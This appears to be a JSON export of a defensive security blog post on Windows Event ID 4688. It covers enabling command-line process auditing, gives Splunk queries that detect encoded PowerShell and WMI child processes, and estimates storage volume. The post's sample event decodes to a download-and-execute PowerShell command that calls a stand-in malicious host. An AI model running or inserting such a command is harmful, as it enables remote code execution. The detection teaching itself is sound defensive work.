{"id":190,"date":"2025-12-23T09:00:00","date_gmt":"2025-12-23T09:00:00","guid":{"rendered":"http:\/\/justruss.tech\/index.php\/2023\/09\/07\/event-id-4688-and-why-process-auditing-matters-more-than-you-think\/"},"modified":"2026-05-15T10:34:55","modified_gmt":"2026-05-15T10:34:55","slug":"event-id-4688-and-why-process-auditing-matters-more-than-you-think","status":"publish","type":"post","link":"https:\/\/justruss.tech\/index.php\/2025\/12\/23\/event-id-4688-and-why-process-auditing-matters-more-than-you-think\/","title":{"rendered":"Event ID 4688 and Why Process Auditing Matters More Than You Think"},"content":{"rendered":"

Windows Security Event ID 4688 logs process creation. Without command line logging enabled, it records that a process ran but not what arguments it was called with. The difference in investigation value between those two states is enormous.<\/p>\n

Enabling command line logging<\/h3>\n

Two separate settings both need to be configured. First, enable Audit Process Creation via Group Policy:<\/p>\n

Computer Configuration > Windows Settings > Security Settings >\nAdvanced Audit Policy Configuration > Detailed Tracking >\nAudit Process Creation: Success<\/pre>\n
Second, enable command line capture via registry:<\/p>\n
reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Audit\" \/v ProcessCreationIncludeCmdLine_Enabled \/t REG_DWORD \/d 1 \/f<\/pre>\n
Both are required. With only the audit policy and not the registry key, 4688 events are generated but the ProcessCommandLine field is empty. Verify both are active:<\/p>\n
auditpol \/get \/subcategory:\"Process Creation\"\n# Process Creation    Success\n\nreg query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Audit\" \/v ProcessCreationIncludeCmdLine_Enabled\n# ProcessCreationIncludeCmdLine_Enabled    REG_DWORD    0x1<\/pre>\n
What the event looks like with command line enabled<\/h3>\n
Log Name:    Security\nEvent ID:    4688\n\nNew Process Name:     C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\nCreator Process Name: C:\\Windows\\System32\\cmd.exe\nProcess Command Line:\n  powershell.exe -NonInteractive -NoProfile -EncodedCommand\n  SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA...<\/pre>\n
Decoding that base64:<\/p>\n
echo \"SQBFAFgA...\" | base64 -d | iconv -f utf-16le -t utf-8\n# IEX (New-Object Net.WebClient).DownloadString('https:\/\/malicious.example\/payload')<\/pre>\n
Splunk detection queries<\/h3>\n
Suspicious encoded PowerShell:<\/p>\n
index=wineventlog EventCode=4688\n  (Process_Command_Line=\"*-EncodedCommand*\" OR Process_Command_Line=\"*-enc *\")\n| rex field=Process_Command_Line \"(?i)-e(?:nc|ncodedcommand)?\\s+(?P<b64>[A-Za-z0-9+\/=]{20,})\"\n| eval decoded=base64decode(b64)\n| table _time, host, Account_Name, Process_Command_Line, decoded<\/pre>\n
WMI spawning child processes:<\/p>\n
index=wineventlog EventCode=4688\n  Creator_Process_Name IN (\"*\\\\WmiPrvSE.exe\", \"*\\\\wmiprvse.exe\")\n  NOT New_Process_Name IN (\"*\\\\WmiPrvSE.exe\", \"*\\\\conhost.exe\")\n| table _time, host, Creator_Process_Name, New_Process_Name, Process_Command_Line<\/pre>\n
Storage volume<\/h3>\n
On an average enterprise workstation generating around 200 process creation events per hour, Event ID 4688 with command line logging adds roughly 15-25MB of raw event data per day per endpoint. At 1,000 endpoints budget approximately 5-8GB per day after SIEM compression and indexing. The storage cost is much lower than the investigation cost of not having this data when you need it.<\/p>\n","protected":false},"excerpt":{"rendered":"
If you are not logging process creation with command line
\narguments enabled, you are missing a significant chunk of attacker activity.<\/p>\n","protected":false},"author":0,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-190","post","type-post","status-publish","format-standard","hentry","category-dfir"],"_links":{"self":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/190","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/comments?post=190"}],"version-history":[{"count":3,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/190\/revisions"}],"predecessor-version":[{"id":262,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/190\/revisions\/262"}],"wp:attachment":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/media?parent=190"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/categories?post=190"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/tags?post=190"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}